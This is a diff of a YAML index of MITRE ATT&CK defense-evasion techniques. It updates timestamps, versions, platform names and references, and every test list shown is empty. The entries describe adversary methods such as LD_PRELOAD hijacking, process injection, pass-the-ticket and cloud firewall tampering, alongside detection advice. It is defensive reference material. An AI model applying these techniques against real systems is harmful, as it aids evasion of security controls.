+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
-      - Azure AD
-      - Office 365
       - SaaS
       - IaaS
       - Linux
       - macOS
-      - Google Workspace
       - Containers
       - Network
-      x_mitre_version: '1.3'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'Logon Session: Logon Session Creation'
       - 'User Account: User Account Authentication'
@@ -5825,14 +5960,11 @@ defense-evasion:
         url: https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1078.001
     atomic_tests: []
   T1574.006:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-30T21:01:40.146Z'
       name: 'Hijack Execution Flow: LD_PRELOAD'
       description: "Adversaries may execute their own malicious payloads by hijacking
         environment variables the dynamic linker uses to load shared libraries. During
@@ -5953,7 +6085,6 @@ defense-evasion:
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
-      spec_version: '2.1'
       identifier: T1574.006
     atomic_tests: []
   T1070.001:
@@ -6027,12 +6158,11 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1070.001
     atomic_tests: []
   T1222:
     technique:
-      modified: '2022-11-08T14:00:00.188Z'
+      modified: '2022-10-19T17:54:06.038Z'
       name: File and Directory Permissions Modification
       description: "Adversaries may modify file or directory permissions/attributes
         to evade access control lists (ACLs) and access protected files.(Citation:
@@ -6129,12 +6259,11 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1222
     atomic_tests: []
   T1548:
     technique:
-      modified: '2024-04-15T20:52:09.908Z'
+      modified: '2024-10-15T15:32:21.811Z'
       name: Abuse Elevation Control Mechanism
       description: 'Adversaries may circumvent mechanisms designed to control elevate
         privileges to gain higher-level permissions. Most modern systems contain native
@@ -6166,11 +6295,10 @@ defense-evasion:
       - Linux
       - macOS
       - Windows
-      - Office 365
       - IaaS
-      - Google Workspace
-      - Azure AD
-      x_mitre_version: '1.3'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'Process: Process Creation'
       - 'User Account: User Account Modification'
@@ -6211,11 +6339,10 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1134.002:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-04-11T21:14:37.714Z'
       name: Create Process with Token
       description: |-
         Adversaries may create a new process with an existing token to escalate privileges and bypass access controls. Processes can be created with the token and resulting security context of another user using features such as <code>CreateProcessWithTokenW</code> and <code>runas</code>.(Citation: Microsoft RunAs)
@@ -6271,12 +6398,11 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1134.002
     atomic_tests: []
   T1548.001:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-15T18:43:20.995Z'
       name: 'Abuse Elevation Control Mechanism: Setuid and Setgid'
       description: |-
         An adversary may abuse configurations where an application has the setuid or setgid bits set in order to get code running in a different (and possibly more privileged) user’s context. On Linux or macOS, when the setuid or setgid bits are set for an application binary, the application will run with the privileges of the owning user or group respectively.(Citation: setuid man page) Normally an application is run in the current user’s context, regardless of which user or group owns the application. However, there are instances where programs need to be executed in an elevated context to function properly, but the user running them may not have the specific required privileges.
@@ -6333,7 +6459,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1548.001
     atomic_tests: []
   T1218.008:
@@ -6369,7 +6494,7 @@ defense-evasion:
         description: 'Giagone, R., Bermejo, L., and Yarochkin, F. (2017, November
           20). Cobalt Strikes Again: Spam Runs Use Macros and CVE-2017-8759 Exploit
           Against Russian Banks. Retrieved March 7, 2019.'
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-03-11T18:52:49.877Z'
       name: 'Signed Binary Proxy Execution: Odbcconf'
       description: "Adversaries may abuse odbcconf.exe to proxy execution of malicious
         payloads. Odbcconf.exe is a Windows utility that allows you to configure Open
@@ -6402,13 +6527,11 @@ defense-evasion:
       - Application control
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1218.008
     atomic_tests: []
   T1548.005:
     technique:
-      modified: '2024-03-28T15:30:09.313Z'
+      modified: '2024-10-15T16:07:49.519Z'
       name: Temporary Elevated Cloud Access
       description: "Adversaries may abuse permission configurations that allow them
         to gain temporarily elevated access to cloud resources. Many cloud environments
@@ -6470,10 +6593,9 @@ defense-evasion:
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
       - IaaS
-      - Azure AD
-      - Office 365
-      - Google Workspace
-      x_mitre_version: '1.1'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.2'
       x_mitre_data_sources:
       - 'User Account: User Account Modification'
       type: attack-pattern
@@ -6531,7 +6653,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1055.013:
     technique:
@@ -6573,7 +6694,7 @@ defense-evasion:
         description: Microsoft. (n.d.). PsSetCreateProcessNotifyRoutine routine. Retrieved
           December 20, 2017.
         source_name: Microsoft PsSetCreateProcessNotifyRoutine routine
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-02-09T15:43:48.848Z'
       name: Process Doppelgänging
       description: "Adversaries may inject malicious code into process via process
         doppelgänging in order to evade process-based defenses as well as possibly
@@ -6632,41 +6753,10 @@ defense-evasion:
       - Administrator
       - SYSTEM
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1578.003:
     technique:
-      x_mitre_platforms:
-      - IaaS
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--70857657-bd0b-4695-ad3e-b13f92cac1b4
-      type: attack-pattern
-      created: '2020-06-16T17:23:06.508Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1578.003
-        url: https://attack.mitre.org/techniques/T1578/003
-      - source_name: Mandiant M-Trends 2020
-        url: https://content.fireeye.com/m-trends/rpt-m-trends-2020
-        description: Mandiant. (2020, February). M-Trends 2020. Retrieved April 24,
-          2020.
-      - source_name: AWS CloudTrail Search
-        url: https://aws.amazon.com/premiumsupport/knowledge-center/cloudtrail-search-api-calls/
-        description: Amazon. (n.d.). Search CloudTrail logs for API calls to EC2 Instances.
-          Retrieved June 17, 2020.
-      - source_name: Azure Activity Logs
-        url: https://docs.microsoft.com/en-us/azure/azure-resource-manager/management/view-activity-logs
-        description: Microsoft. (n.d.). View Azure activity logs. Retrieved June 17,
-          2020.
-      - source_name: Cloud Audit Logs
-        url: https://cloud.google.com/logging/docs/audit#admin-activity
-        description: Google. (n.d.). Audit Logs. Retrieved June 1, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-09-30T13:28:37.415Z'
       name: Delete Cloud Instance
       description: |-
         An adversary may delete a cloud instance after they have performed malicious activities in an attempt to evade detection and remove evidence of their presence.  Deleting an instance or virtual machine can remove valuable forensic artifacts and other evidence of suspicious behavior if the instance is not recoverable.
@@ -6675,20 +6765,50 @@ defense-evasion:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: defense-evasion
+      x_mitre_contributors:
+      - Arun Seelagan, CISA
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         The deletion of a new instance or virtual machine is a common part of operations within many cloud environments. Events should then not be viewed in isolation, but as part of a chain of behavior that could lead to other activities. For example, detecting a sequence of events such as the creation of an instance, mounting of a snapshot to that instance, and deletion of that instance by a new user account may indicate suspicious activity.
 
         In AWS, CloudTrail logs capture the deletion of an instance in the <code>TerminateInstances</code> event, and in Azure the deletion of a VM may be captured in Azure activity logs.(Citation: AWS CloudTrail Search)(Citation: Azure Activity Logs) Google's Admin Activity audit logs within their Cloud Audit logs can be used to detect the usage of <code>gcloud compute instances delete</code> to delete a VM.(Citation: Cloud Audit Logs)
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.1'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - IaaS
+      x_mitre_version: '1.2'
       x_mitre_data_sources:
       - 'Instance: Instance Metadata'
       - 'Instance: Instance Deletion'
-      x_mitre_permissions_required:
-      - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--70857657-bd0b-4695-ad3e-b13f92cac1b4
+      created: '2020-06-16T17:23:06.508Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1578/003
+        external_id: T1578.003
+      - source_name: AWS CloudTrail Search
+        description: Amazon. (n.d.). Search CloudTrail logs for API calls to EC2 Instances.
+          Retrieved June 17, 2020.
+        url: https://aws.amazon.com/premiumsupport/knowledge-center/cloudtrail-search-api-calls/
+      - source_name: Cloud Audit Logs
+        description: Google. (n.d.). Audit Logs. Retrieved June 1, 2020.
+        url: https://cloud.google.com/logging/docs/audit#admin-activity
+      - source_name: Mandiant M-Trends 2020
+        description: Mandiant. (2020, February). M-Trends 2020. Retrieved April 24,
+          2020.
+        url: https://www.mandiant.com/sites/default/files/2021-09/mtrends-2020.pdf
+      - source_name: Azure Activity Logs
+        description: Microsoft. (n.d.). View Azure activity logs. Retrieved June 17,
+          2020.
+        url: https://docs.microsoft.com/en-us/azure/azure-resource-manager/management/view-activity-logs
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1574.005:
     technique:
@@ -6718,7 +6838,7 @@ defense-evasion:
         description: 'Stefan Kanthak. (2015, December 8). Executable installers are
           vulnerable^WEVIL (case 7): 7z*.exe allows remote code execution with escalation
           of privilege. Retrieved December 4, 2014.'
-      modified: '2020-10-27T14:49:39.188Z'
+      modified: '2020-03-26T19:20:23.030Z'
       name: Executable Installer File Permissions Weakness
       description: |-
         Adversaries may execute their own malicious payloads by hijacking the binaries used by an installer. These processes may automatically execute specific binaries as part of their functionality or to perform other actions. If the permissions on the file system directory containing a target binary, or permissions on the binary itself, are improperly set, then the target binary may be overwritten with another binary using user-level permissions and executed by the original process. If the original process and thread are running under a higher permissions level, then the replaced binary will also execute under higher-level permissions, which could include SYSTEM.
@@ -6753,8 +6873,6 @@ defense-evasion:
       - Administrator
       - User
       - SYSTEM
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1562.006:
     technique:
@@ -6845,12 +6963,11 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1562.006
     atomic_tests: []
   T1562.007:
     technique:
-      modified: '2023-04-15T00:25:36.502Z'
+      modified: '2024-10-16T19:38:57.374Z'
       name: Disable or Modify Cloud Firewall
       description: "Adversaries may disable or modify a firewall within a cloud environment
         to bypass controls that limit access to cloud resources. Cloud firewalls are
@@ -6858,19 +6975,25 @@ defense-evasion:
         Firewall](https://attack.mitre.org/techniques/T1562/004). \n\nCloud environments
         typically utilize restrictive security groups and firewall rules that only
         allow network activity from trusted IP addresses via expected ports and protocols.
-        An adversary may introduce new firewall rules or policies to allow access
-        into a victim cloud environment. For example, an adversary may use a script
-        or utility that creates new ingress rules in existing security groups to allow
-        any TCP/IP connectivity, or remove networking limitations to support traffic
-        associated with malicious activity (such as cryptomining).(Citation: Expel
-        IO Evil in AWS)(Citation: Palo Alto Unit 42 Compromised Cloud Compute Credentials
-        2022)\n\nModifying or disabling a cloud firewall may enable adversary C2 communications,
-        lateral movement, and/or data exfiltration that would otherwise not be allowed."
+        An adversary with appropriate permissions may introduce new firewall rules
+        or policies to allow access into a victim cloud environment and/or move laterally
+        from the cloud control plane to the data plane. For example, an adversary
+        may use a script or utility that creates new ingress rules in existing security
+        groups (or creates new security groups entirely) to allow any TCP/IP connectivity
+        to a cloud-hosted instance.(Citation: Palo Alto Unit 42 Compromised Cloud
+        Compute Credentials 2022) They may also remove networking limitations to support
+        traffic associated with malicious activity (such as cryptomining).(Citation:
+        Expel IO Evil in AWS)(Citation: Palo Alto Unit 42 Compromised Cloud Compute
+        Credentials 2022)\n\nModifying or disabling a cloud firewall may enable adversary
+        C2 communications, lateral movement, and/or data exfiltration that would otherwise
+        not be allowed. It may also be used to open up resources for [Brute Force](https://attack.mitre.org/techniques/T1110)
+        or [Endpoint Denial of Service](https://attack.mitre.org/techniques/T1499). "
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: defense-evasion
       x_mitre_contributors:
       - Expel
+      - Arun Seelagan, CISA
       x_mitre_deprecated: false
       x_mitre_detection: Monitor cloud logs for modification or creation of new security
         groups or firewall rules.
@@ -6879,7 +7002,7 @@ defense-evasion:
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
       - IaaS
-      x_mitre_version: '1.2'
+      x_mitre_version: '1.3'
       x_mitre_data_sources:
       - 'Firewall: Firewall Disable'
       - 'Firewall: Firewall Rule Modification'
@@ -6902,9 +7025,8 @@ defense-evasion:
         url: https://unit42.paloaltonetworks.com/compromised-cloud-compute-credentials/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1036.002:
     technique:
@@ -6937,7 +7059,7 @@ defense-evasion:
         description: Firsh, A.. (2018, February 13). Zero-day vulnerability in Telegram
           - Cybercriminals exploited Telegram flaw to launch multipurpose attacks.
           Retrieved April 22, 2019.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-14T21:01:59.733Z'
       name: Right-to-Left Override
       description: |-
         Adversaries may abuse the right-to-left override (RTLO or RLO) character (U+202E) to disguise a string and/or file name to make it appear benign. RTLO is a non-printing Unicode character that causes the text that follows it to be displayed in reverse. For example, a Windows screensaver executable named <code>March 25 \u202Excod.scr</code> will display as <code>March 25 rcs.docx</code>. A JavaScript file named <code>photo_high_re\u202Egnp.js</code> will be displayed as <code>photo_high_resj.png</code>.(Citation: Infosecinstitute RTLO Technique)
@@ -6956,8 +7078,6 @@ defense-evasion:
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'File: File Metadata'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1542.002:
     technique:
@@ -6988,7 +7108,7 @@ defense-evasion:
           health and make sure it's not already dying on you. Retrieved October 2,
           2018.
         source_name: ITWorld Hard Disk Health Dec 2014
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-01T20:43:55.632Z'
       name: Component Firmware
       description: |-
         Adversaries may modify component firmware to persist on systems. Some adversaries may employ sophisticated means to compromise computer components and install malicious firmware that will execute adversary code outside of the operating system and main system firmware or BIOS. This technique may be similar to [System Firmware](https://attack.mitre.org/techniques/T1542/001) but conducted upon other system components/devices that may not have the same capability or level of integrity checking.
@@ -7018,12 +7138,10 @@ defense-evasion:
       - SYSTEM
       x_mitre_system_requirements:
       - Ability to update component device firmware from the host operating system.
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1070:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-10-15T15:59:22.125Z'
       name: Indicator Removal on Host
       description: |-
         Adversaries may delete or modify artifacts generated within systems to remove evidence of their presence or hinder defenses. Various artifacts may be created by an adversary or something that can be attributed to an adversary’s actions. Typically these artifacts are used as defensive indicators related to monitored events, such as strings from downloaded files, logs that are generated from user actions, and other data analyzed by defenders. Location, format, and type of artifact (such as command or login history) are often specific to each platform.
@@ -7049,9 +7167,8 @@ defense-evasion:
       - Windows
       - Containers
       - Network
-      - Office 365
-      - Google Workspace
-      x_mitre_version: '2.1'
+      - Office Suite
+      x_mitre_version: '2.2'
       x_mitre_data_sources:
       - 'Scheduled Job: Scheduled Job Modification'
       - 'File: File Modification'
@@ -7082,14 +7199,13 @@ defense-evasion:
         external_id: T1070
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1070
     atomic_tests: []
   T1550.003:
     technique:
-      modified: '2023-10-31T14:00:00.188Z'
+      modified: '2024-09-12T15:21:09.330Z'
       name: 'Use Alternate Authentication Material: Pass the Ticket'
       description: |-
         Adversaries may “pass the ticket” using stolen Kerberos tickets to move laterally within an environment, bypassing normal system access controls. Pass the ticket (PtT) is a method of authenticating to a system using Kerberos tickets without having access to an account's password. Kerberos authentication can be used as the first step to lateral movement to a remote system.
@@ -7109,6 +7225,7 @@ defense-evasion:
       x_mitre_contributors:
       - Vincent Le Toux
       - Ryan Becwar
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Audit all Kerberos authentication and credential use events and review for discrepancies. Unusual remote authentication events that correlate with other suspicious activity (such as writing and executing binaries) may indicate malicious activity.
 
@@ -7116,7 +7233,6 @@ defense-evasion:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
       x_mitre_version: '1.1'
@@ -7132,34 +7248,35 @@ defense-evasion:
       id: attack-pattern--7b211ac6-c815-4189-93a9-ab415deca926
       created: '2020-01-30T17:03:43.072Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
         url: https://attack.mitre.org/techniques/T1550/003
         external_id: T1550.003
-      - source_name: ADSecurity AD Kerberos Attacks
-        description: Metcalf, S. (2014, November 22). Mimikatz and Active Directory
-          Kerberos Attacks. Retrieved June 2, 2016.
-        url: https://adsecurity.org/?p=556
-      - source_name: GentilKiwi Pass the Ticket
-        description: Deply, B. (2014, January 13). Pass the ticket. Retrieved June
-          2, 2016.
-        url: http://blog.gentilkiwi.com/securite/mimikatz/pass-the-ticket-kerberos
+      - source_name: CERT-EU Golden Ticket Protection
+        description: Abolins, D., Boldea, C., Socha, K., Soria-Machado, M. (2016,
+          April 26). Kerberos Golden Ticket Protection. Retrieved July 13, 2017.
+        url: https://cert.europa.eu/static/WhitePapers/UPDATED%20-%20CERT-EU_Security_Whitepaper_2014-007_Kerberos_Golden_Ticket_Protection_v1_4.pdf
       - source_name: Campbell 2014
         description: Campbell, C. (2014). The Secret Life of Krbtgt. Retrieved December
           4, 2014.
         url: http://defcon.org/images/defcon-22/dc-22-presentations/Campbell/DEFCON-22-Christopher-Campbell-The-Secret-Life-of-Krbtgt.pdf
+      - source_name: GentilKiwi Pass the Ticket
+        description: Deply, B. (2014, January 13). Pass the ticket. Retrieved September
+          12, 2024.
+        url: https://web.archive.org/web/20210515214027/https://blog.gentilkiwi.com/securite/mimikatz/pass-the-ticket-kerberos
+      - source_name: ADSecurity AD Kerberos Attacks
+        description: Metcalf, S. (2014, November 22). Mimikatz and Active Directory
+          Kerberos Attacks. Retrieved June 2, 2016.
+        url: https://adsecurity.org/?p=556
       - source_name: Stealthbits Overpass-the-Hash
         description: Warren, J. (2019, February 26). How to Detect Overpass-the-Hash
           Attacks. Retrieved February 4, 2021.
         url: https://stealthbits.com/blog/how-to-detect-overpass-the-hash-attacks/
-      - source_name: CERT-EU Golden Ticket Protection
-        description: Abolins, D., Boldea, C., Socha, K., Soria-Machado, M. (2016,
-          April 26). Kerberos Golden Ticket Protection. Retrieved July 13, 2017.
-        url: https://cert.europa.eu/static/WhitePapers/UPDATED%20-%20CERT-EU_Security_Whitepaper_2014-007_Kerberos_Golden_Ticket_Protection_v1_4.pdf
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
-      spec_version: '2.1'
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1550.003
     atomic_tests: []
   T1036.004:
@@ -7225,7 +7342,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1036.004
     atomic_tests: []
   T1055.004:
@@ -7264,7 +7380,7 @@ defense-evasion:
           A Technical Survey Of Common And Trending Process Injection Techniques.
           Retrieved December 7, 2017.'
         source_name: Elastic Process Injection July 2017
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-18T12:23:46.476Z'
       name: 'Process Injection: Asynchronous Procedure Call'
       description: "Adversaries may inject malicious code into processes via the asynchronous
         procedure call (APC) queue in order to evade process-based defenses as well
@@ -7313,8 +7429,6 @@ defense-evasion:
       x_mitre_defense_bypassed:
       - Application control
       - Anti-virus
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1055.004
     atomic_tests: []
   T1647:
@@ -7365,7 +7479,7 @@ defense-evasion:
         pairs to insert environment variables, such as <code>LSEnvironment</code>,
         to enable persistence via [Dynamic Linker Hijacking](https://attack.mitre.org/techniques/T1574/006).(Citation:
         wardle chp2 persistence)(Citation: eset_osx_flashback)"
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-20T22:00:33.375Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: Plist File Modification
       x_mitre_detection: "Monitor for common command-line editors used to modify plist
@@ -7386,7 +7500,6 @@ defense-evasion:
       - 'File: File Modification'
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1647
     atomic_tests: []
   T1553.005:
@@ -7453,7 +7566,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1553.005
     atomic_tests: []
   T1600.002:
@@ -7476,7 +7588,7 @@ defense-evasion:
         url: https://community.cisco.com/t5/security-blogs/attackers-continue-to-target-legacy-devices/ba-p/4169954
         description: Omar Santos. (2020, October 19). Attackers Continue to Target
           Legacy Devices. Retrieved October 20, 2020.
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-10-21T22:37:48.503Z'
       name: Disable Crypto Hardware
       description: |-
         Adversaries disable a network device’s dedicated hardware encryption, which may enable them to leverage weaknesses in software encryption in order to reduce the effort involved in collecting, manipulating, and exfiltrating transmitted data.
@@ -7497,8 +7609,6 @@ defense-evasion:
       - 'File: File Modification'
       x_mitre_permissions_required:
       - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1542:
     technique:
@@ -7559,11 +7669,10 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1612:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-04-15T16:22:09.807Z'
       name: Build Image on Host
       description: "Adversaries may build a container image directly on a host to
         bypass defenses that monitor for the retrieval of malicious images from a
@@ -7628,7 +7737,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1612
     atomic_tests: []
   T1055.002:
@@ -7652,7 +7760,7 @@ defense-evasion:
           A Technical Survey Of Common And Trending Process Injection Techniques.
           Retrieved December 7, 2017.'
         source_name: Elastic Process Injection July 2017
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-18T12:21:11.178Z'
       name: 'Process Injection: Portable Executable Injection'
       description: "Adversaries may inject portable executables (PE) into processes
         in order to evade process-based defenses as well as possibly elevate privileges.
@@ -7696,8 +7804,6 @@ defense-evasion:
       - Application control
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1055.002
     atomic_tests: []
   T1218.012:
@@ -7753,7 +7859,7 @@ defense-evasion:
         not account for its potential abuse.(Citation: LOLBAS Verclsid)(Citation:
         Red Canary Verclsid.exe)(Citation: BOHOPS Abusing the COM Registry)(Citation:
         Nick Tyrer GitHub) "
-      modified: '2022-10-25T14:00:00.188Z'
+      modified: '2022-05-20T17:35:28.221Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: Verclsid
       x_mitre_detection: Use process monitoring to monitor the execution and arguments
@@ -7777,7 +7883,6 @@ defense-evasion:
       - Digital Certificate Validation
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1562.010:
     technique:
@@ -7868,40 +7973,11 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1562.010
     atomic_tests: []
   T1497:
     technique:
-      x_mitre_platforms:
-      - Windows
-      - macOS
-      - Linux
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Deloitte Threat Library Team
-      - Sunny Neo
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--82caa33e-d11a-433a-94ea-9b5a5fbef81d
-      type: attack-pattern
-      created: '2019-04-17T22:22:24.505Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1497
-        url: https://attack.mitre.org/techniques/T1497
-      - source_name: Deloitte Environment Awareness
-        url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc
-        description: Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved
-          May 18, 2021.
-      - source_name: Unit 42 Pirpi July 2015
-        url: https://unit42.paloaltonetworks.com/ups-observations-on-cve-2015-3113-prior-zero-days-and-the-pirpi-payload/
-        description: 'Falcone, R., Wartell, R.. (2015, July 27). UPS: Observations
-          on CVE-2015-3113, Prior Zero-Days and the Pirpi Payload. Retrieved April
-          23, 2019.'
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-09-12T15:50:18.049Z'
       name: Virtualization/Sandbox Evasion
       description: |+
